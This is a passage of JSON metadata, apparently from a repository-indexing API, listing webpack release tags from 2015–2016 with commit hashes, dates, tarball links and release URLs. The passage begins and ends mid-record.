304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependen